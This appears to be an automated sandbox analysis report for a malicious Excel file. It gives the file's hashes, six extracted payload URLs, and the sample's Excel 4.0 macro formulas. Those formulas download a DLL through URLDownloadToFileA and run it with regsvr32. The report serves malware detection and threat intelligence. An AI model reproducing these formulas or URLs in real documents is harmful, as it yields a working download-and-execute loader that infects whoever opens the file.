General
-
Target
27526c559adce110e0fc7aca91d1d68fe1eb295690ecaf586a54069c742a5492
-
Size
44KB
-
MD5
5b68a049e2a7f75d482cde3e2ff0032e
-
SHA1
0e324df4ddc7da7a9027be838e44c1bd72937519
-
SHA256
27526c559adce110e0fc7aca91d1d68fe1eb295690ecaf586a54069c742a5492
-
SHA512
43bb61bbbf006a97e0ccc4adb0490cd8c38f7ce16c3c2bd0acbed58bf7a4cc2ca33264d7197cc24185c37b0542dfeaa1498e83f85d8d684410aa7c21a195b274
-
SSDEEP
768:1C5uuXq9z0fdc/buIgsqlkVw2WFc8SGnCu2JBgBkXrI34gH606BE6tI82vqc:g5Lo0sb6yVwpFB1CuEge7tgH60stnyqc
Malware Config
Extracted
http://moveconnects.com/wp-admin/network/7T8g9DAohsL/
http://benzo-pl.com/wp-content/NVJU3gASPcyRDctfsM/
http://mentalpeaks.care/kymogram/ex1hhh/
https://melhoreseudia.club/assets/JbQzzZ7UBaXq7bB/
http://meca-global.com/okickb/Vm1FMsVcbL/
http://bizfedlacounty.org/wp-auth/GxsV/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://moveconnects.com/wp-admin/network/7T8g9DAohsL/","..\enu.ocx",0,0) =IF('EFALGV'!D10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://benzo-pl.com/wp-content/NVJU3gASPcyRDctfsM/","..\enu.ocx",0,0)) =IF('EFALGV'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://mentalpeaks.care/kymogram/ex1hhh/","..\enu.ocx",0,0)) =IF('EFALGV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://melhoreseudia.club/assets/JbQzzZ7UBaXq7bB/","..\enu.ocx",0,0)) =IF('EFALGV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://meca-global.com/okickb/Vm1FMsVcbL/","..\enu.ocx",0,0)) =IF('EFALGV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bizfedlacounty.org/wp-auth/GxsV/","..\enu.ocx",0,0)) =IF('EFALGV'!D20<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\enu.ocx") =RETURN()
Signatures
Files
-
27526c559adce110e0fc7aca91d1d68fe1eb295690ecaf586a54069c742a5492